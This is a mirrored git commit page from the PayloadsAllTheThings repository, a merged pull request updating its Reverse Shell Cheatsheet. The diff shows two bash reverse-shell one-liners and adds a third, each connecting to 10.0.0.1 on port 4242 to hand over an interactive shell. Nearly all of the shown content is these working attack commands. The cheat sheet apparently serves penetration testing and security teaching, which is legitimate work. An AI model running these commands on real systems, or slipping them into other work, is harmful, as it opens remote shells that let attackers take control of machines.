mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Merge pull request #348 from pswalia2u/patch-1
Update Reverse Shell Cheatsheet.md
This commit is contained in:
commit
1592756f9c
@ -46,6 +46,8 @@
|
||||
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
|
||||
|
||||
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
|
||||
|
||||
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1
|
||||
```
|
||||
|
||||
### Bash UDP
|
||||
|
Loading…
Reference in New Issue
Block a user